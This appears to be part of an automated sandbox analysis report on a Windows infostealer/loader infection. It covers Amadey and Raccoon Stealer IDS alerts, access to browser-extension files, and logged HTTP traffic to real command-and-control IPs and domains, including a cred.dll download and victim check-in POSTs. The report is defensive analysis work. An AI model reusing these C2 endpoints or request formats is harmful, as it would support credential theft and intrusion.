                          Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.771517190.0000000004E2A000.00000004.00000001.sdmp
                          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: powrprof.pdbL source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000F.00000003.772634136.0000000003190000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.771566987.0000000003190000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: shcore.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: Windows.Storage.pdbM source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: C:\buti15\juyekuzotaj-yodod\ciso_pematufuz.pdb source: E748.exe, 00000011.00000000.781295267.0000000000401000.00000020.00020000.sdmp, E748.exe, 00000011.00000002.957299537.00000000008A2000.00000004.00000001.sdmp, gecrjwsv.exe, 00000020.00000000.799382925.0000000000401000.00000020.00020000.sdmp, svchost.exe, 00000022.00000003.896342042.0000000000C4F000.00000004.00000001.sdmp
                          Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: shell32.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: -C:\jixixahut\vovima50\zuwa\ficux93 lodedam pazuwisivovu\sewidel.pdbh source: 5C89.exe, 00000026.00000003.849959984.00000000030D0000.00000004.00000001.sdmp, 5C89.exe, 00000026.00000002.987438014.0000000003010000.00000040.00000001.sdmp
                          Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000F.00000003.772634136.0000000003190000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.771566987.0000000003190000.00000004.00000001.sdmp
                          Source: Binary string: profapi.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 9334.exe, 0000000B.00000000.759170928.0000000000413000.00000002.00020000.sdmp, 9334.exe, 0000000B.00000000.767055660.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000000F.00000002.803672016.0000000002F80000.00000002.00020000.sdmp
                          Source: Binary string: `C:\buti15\juyekuzotaj-yodod\ciso_pematufuz.pdbh source: E748.exe, 00000011.00000000.781295267.0000000000401000.00000020.00020000.sdmp, E748.exe, 00000011.00000002.957299537.00000000008A2000.00000004.00000001.sdmp, gecrjwsv.exe, 00000020.00000000.799382925.0000000000401000.00000020.00020000.sdmp, svchost.exe, 00000022.00000003.896342042.0000000000C4F000.00000004.00000001.sdmp
                          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: sechost.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: :]WC:\yakon-nabavazolof\masa.pdb source: 5C89.exe, 00000026.00000002.987710608.0000000003250000.00000040.00000001.sdmp, 5C89.exe, 00000026.00000003.853855551.0000000003300000.00000004.00000001.sdmp
                          Source: Binary string: cfgmgr32.pdbH source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: C:\lalovum36_po.pdb source: tijXCZsbGe.exe, tijXCZsbGe.exe, 00000000.00000000.664586745.0000000000401000.00000020.00020000.sdmp, tijXCZsbGe.exe, 00000000.00000002.670247198.0000000000401000.00000020.00020000.sdmp, tijXCZsbGe.exe, 00000001.00000000.668244716.0000000000401000.00000020.00020000.sdmp, rifsswe, 00000009.00000002.756214332.0000000000401000.00000020.00020000.sdmp, rifsswe, 00000009.00000000.750595038.0000000000401000.00000020.00020000.sdmp, rifsswe, 0000000A.00000000.753285521.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: C:\yakon-nabavazolof\masa.pdb source: 5C89.exe, 00000026.00000002.987710608.0000000003250000.00000040.00000001.sdmp, 5C89.exe, 00000026.00000003.853855551.0000000003300000.00000004.00000001.sdmp
                          Source: Binary string: Kernel.Appcore.pdbN source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdbR source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: sechost.pdbk source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000F.00000003.781663555.0000000005110000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdb source: WerFault.exe, 0000000F.00000003.781676244.0000000005116000.00000004.00000040.sdmp
                          Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000F.00000003.781655365.0000000005141000.00000004.00000001.sdmp
                          Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 9334.exe, 0000000B.00000000.759170928.0000000000413000.00000002.00020000.sdmp, 9334.exe, 0000000B.00000000.767055660.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000000F.00000002.803672016.0000000002F80000.00000002.00020000.sdmp
                          Source: Binary string: C:\lalovum36_po.pdbh source: tijXCZsbGe.exe, 00000000.00000000.664586745.0000000000401000.00000020.00020000.sdmp, tijXCZsbGe.exe, 00000000.00000002.670247198.0000000000401000.00000020.00020000.sdmp, tijXCZsbGe.exe, 00000001.00000000.668244716.0000000000401000.00000020.00020000.sdmp, rifsswe, 00000009.00000002.756214332.0000000000401000.00000020.00020000.sdmp, rifsswe, 00000009.00000000.750595038.0000000000401000.00000020.00020000.sdmp, rifsswe, 0000000A.00000000.753285521.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: C:\zazadix dori\kol.pdbh source: DB31.exe, 00000010.00000000.772191492.0000000000401000.00000020.00020000.sdmp
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 0_2_00419BC1 BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,SetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameA,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeW,FindFirstFileExW,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,

                          Networking:

                          barindex
                          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                          Source: TrafficSnort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.4:49878 -> 141.8.194.74:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49890 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 1087 WEB-MISC whisker tab splice attack 192.168.2.4:49891 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49893 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49915 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49918 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49920 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49922 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49923 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49924 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49929 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.4:49930 -> 185.163.204.24:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49931 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.4:49935 -> 141.8.194.74:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49936 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49940 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49941 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49942 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49943 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 1087 WEB-MISC whisker tab splice attack 192.168.2.4:49946 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49945 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49947 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49948 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49949 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49951 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49952 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49953 -> 185.215.113.35:80
                          System process connects to network (likely due to code injection or exploit)Show sources
                          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 40.93.207.0 25
                          Source: C:\Windows\explorer.exeDomain query: patmushta.info
                          Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                          Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                          Source: C:\Windows\explorer.exeDomain query: unicupload.top
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.188.183.61 443
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                          Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                          Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
                          Source: C:\Windows\explorer.exeDomain query: goo.su
                          Source: C:\Windows\explorer.exeDomain query: transfer.sh
                          Source: C:\Windows\explorer.exeDomain query: a0621298.xsph.ru
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                          Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /d2VxjasuwS/plugins/cred.dll HTTP/1.1Host: 185.215.113.35
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 37 39 36 30 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=179605&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----05b424179b6863bc044442966a2693c0Host: 185.215.113.35Content-Length: 105185Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /capibar HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 185.163.204.22
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 37 39 36 30 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=179605&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 37 39 36 30 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=179605&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 37 39 36 30 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=179605&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 37 39 36 30 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=179605&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 37 39 36 30 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=179605&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 37 39 36 30 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=179605&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 37 39 36 30 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=179605&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: GET /capibar HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 185.163.204.22
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 37 39 36 30 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=179605&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 185.163.204.24
                          Source: global trafficHTTP traffic detected: GET //l/f/S2zKVH4BZ2GIX1a3NFPE/71fe7726da53cb25be1ef5cfcccec20e728d94fe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 37 39 36 30 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=179605&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 37 39 36 30 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=179605&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 37 39 36 30 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=179605&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 37 39 36 30 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=179605&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 37 39 36 30 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=179605&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 37 39 36 30 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=179605&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 37 39 36 30 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=179605&un=user&dm=&av=13&lv=0
